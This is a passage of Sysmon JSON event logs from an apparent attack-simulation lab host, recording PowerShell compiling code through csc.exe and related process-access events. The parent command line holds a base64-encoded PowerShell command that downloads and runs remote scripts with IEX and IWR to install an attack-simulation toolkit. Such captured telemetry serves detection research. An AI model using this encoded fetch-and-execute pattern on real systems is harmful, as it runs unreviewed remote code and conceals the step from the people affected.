(x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:55:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5122,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:55:03.694\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\c42geipp\\c42geipp.dll\r\nCreationUtcTime: 2020-08-01 06:55:03.694","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:55:03.694","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\c42geipp\\c42geipp.dll","CreationUtcTime":"2020-08-01 06:55:03.694","EventReceivedTime":"2020-08-01 06:55:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5123,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:03.694\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\c42geipp\\c42geipp.cmdline\r\nCreationUtcTime: 2020-08-01 06:55:03.694","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:03.694","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\c42geipp\\c42geipp.cmdline","CreationUtcTime":"2020-08-01 06:55:03.694","EventReceivedTime":"2020-08-01 06:55:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5124,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:03.709\r\nProcessGuid: {E2A3D6B1-11C7-5F25-0000-0010882D0700}\r\nProcessId: 4228\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nFileVersion: 4.7.2053.0 built by: NET47REL1\r\nDescription: Visual C# Command Line Compiler\r\nProduct: Microsoft® .NET Framework\r\nCompany: Microsoft Corporation\r\nOriginalFileName: csc.exe\r\nCommandLine: \"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\Administrator\\AppData\\Local\\Temp\\c42geipp\\c42geipp.cmdline\"\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {E2A3D6B1-11C4-5F25-0000-002093D80600}\r\nLogonId: 0x6D893\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52\r\nParentProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nParentProcessId: 4500\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAIgBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAEkAbgB0AGUAcgBuAGUAdAAgAEUAeABwAGwAbwByAGUAcgBcAE0AYQBpAG4AIgAgAC0ATgBhAG0AZQAgACIARABpAHMAYQBiAGwAZQBGAGkAcgBzAHQAUgB1AG4AQwB1AHMAdABvAG0AaQB6AGUAIgAgAC0AVgBhAGwAdQBlACAAMgAKAEkARQBYACAAKABJAFcAUgAgAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcgBlAGQAYwBhAG4AYQByAHkAYwBvAC8AaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAC8AbQBhAHMAdABlAHIALwBpAG4AcwB0AGEAbABsAC0AYQB0AG8AbQBpAGMAcgBlAGQAdABlAGEAbQAuAHAAcwAxACkACgBJAG4AcwB0AGEAbABsAC0AQQB0AG8AbQBpAGMAUgBlAGQAVABlAGEAbQAgAC0ARgBvAHIAYwBlAAoASQBFAFgAIAAoAEkAVwBSACAAJwBoAHQAdABwAHMAOgAvAC8AcgBhAHcALgBnAGkAdABoAHUAYgB1AHMAZQByAGMAbwBuAHQAZQBuAHQALgBjAG8AbQAvAHIAZQBkAGMAYQBuAGEAcgB5AGMAbwAvAGkAbgB2AG8AawBlAC0AYQB0AG8AbQBpAGMAcgBlAGQAdABlAGEAbQAvAG0AYQBzAHQAZQByAC8AaQBuAHMAdABhAGwAbAAtAGEAdABvAG0AaQBjAHMAZgBvAGwAZABlAHIALgBwAHMAMQAnACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwApAAoASQBuAHMAdABhAGwAbAAtAEEAdABvAG0AaQBjAHMARgBvAGwAZABlAHIAIAAtAEYAbwByAGMAZQAgAC0AUgBlAHAAbwBPAHcAbgBlAHIAIAAiAHMAcABsAHUAbgBrACIAIAAtAEIAcgBhAG4AYwBoACAAIgBsAG8AYwBhAGwALQBtAGEAcwB0AGUAcgAiAA==","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:03.709","ProcessGuid":"{E2A3D6B1-11C7-5F25-0000-0010882D0700}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","FileVersion":"4.7.2053.0 built by: NET47REL1","Description":"Visual C# Command Line Compiler","Product":"Microsoft® .NET Framework","Company":"Microsoft Corporation","OriginalFileName":"csc.exe","CommandLine":"\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\Administrator\\AppData\\Local\\Temp\\c42geipp\\c42geipp.cmdline\"","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{E2A3D6B1-11C4-5F25-0000-002093D80600}","LogonId":"0x6d893","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52","ParentProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","ParentProcessId":"4500","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAIgBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAEkAbgB0AGUAcgBuAGUAdAAgAEUAeABwAGwAbwByAGUAcgBcAE0AYQBpAG4AIgAgAC0ATgBhAG0AZQAgACIARABpAHMAYQBiAGwAZQBGAGkAcgBzAHQAUgB1AG4AQwB1AHMAdABvAG0AaQB6AGUAIgAgAC0AVgBhAGwAdQBlACAAMgAKAEkARQBYACAAKABJAFcAUgAgAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcgBlAGQAYwBhAG4AYQByAHkAYwBvAC8AaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAC8AbQBhAHMAdABlAHIALwBpAG4AcwB0AGEAbABsAC0AYQB0AG8AbQBpAGMAcgBlAGQAdABlAGEAbQAuAHAAcwAxACkACgBJAG4AcwB0AGEAbABsAC0AQQB0AG8AbQBpAGMAUgBlAGQAVABlAGEAbQAgAC0ARgBvAHIAYwBlAAoASQBFAFgAIAAoAEkAVwBSACAAJwBoAHQAdABwAHMAOgAvAC8AcgBhAHcALgBnAGkAdABoAHUAYgB1AHMAZQByAGMAbwBuAHQAZQBuAHQALgBjAG8AbQAvAHIAZQBkAGMAYQBuAGEAcgB5AGMAbwAvAGkAbgB2AG8AawBlAC0AYQB0AG8AbQBpAGMAcgBlAGQAdABlAGEAbQAvAG0AYQBzAHQAZQByAC8AaQBuAHMAdABhAGwAbAAtAGEAdABvAG0AaQBjAHMAZgBvAGwAZABlAHIALgBwAHMAMQAnACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwApAAoASQBuAHMAdABhAGwAbAAtAEEAdABvAG0AaQBjAHMARgBvAGwAZABlAHIAIAAtAEYAbwByAGMAZQAgAC0AUgBlAHAAbwBPAHcAbgBlAHIAIAAiAHMAcABsAHUAbgBrACIAIAAtAEIAcgBhAG4AYwBoACAAIgBsAG8AYwBhAGwALQBtAGEAcwB0AGUAcgAiAA==","EventReceivedTime":"2020-08-01 06:55:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5125,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:03.694\r\nSourceProcessGUID: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nSourceProcessId: 4500\r\nSourceThreadId: 4128\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-11C7-5F25-0000-0010882D0700}\r\nTargetProcessId: 4228\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+270222|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26fe9f|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f9ee|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f97a|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26e48b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c241b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c18c9|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.P521220ea#\\7c5888f012755a21c68b60f0e76e135b\\Microsoft.PowerShell.Commands.Utility.ni.dll+3d40(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.P521220ea#\\7c5888f012755a21c68b60f0e76e135b\\Microsoft.PowerShell.Commands.Utility.ni.dll+3d40(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f7824c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f54025(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f53cf6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+98a0510b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f1488c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f72d5b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f563c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f563c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f563c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f563c0(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:03.694","SourceProcessGUID":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","SourceProcessId":"4500","SourceThreadId":"4128","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{E2A3D6B1-11C7-5F25-0000-0010882D0700}","TargetProcessId":"4228","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+270222|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26fe9f|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f9ee|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f97a|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26e48b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c241b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c18c9|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.P521220ea#\\7c5888f012755a21c68b60f0e76e135b\\Microsoft.PowerShell.Commands.Utility.ni.dll+3d40(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.P521220ea#\\7c5888f012755a21c68b60f0e76e135b\\Microsoft.PowerShell.Commands.Utility.ni.dll+3d40(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f7824c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f54025(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f53cf6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+98a0510b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f1488c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f72d5b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f563c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f563c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f563c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f563c0(wow64)","EventReceivedTime":"2020-08-01 06:55:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5126,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:03.694\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-11C7-5F25-0000-0010882D0700}\r\nTargetProcessId: 4228\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:03.694","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-11C7-5F25-0000-0010882D0700}","TargetProcessId":"4228","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:55:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5127,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:03.694\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:03.694","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5128,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:03.710\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 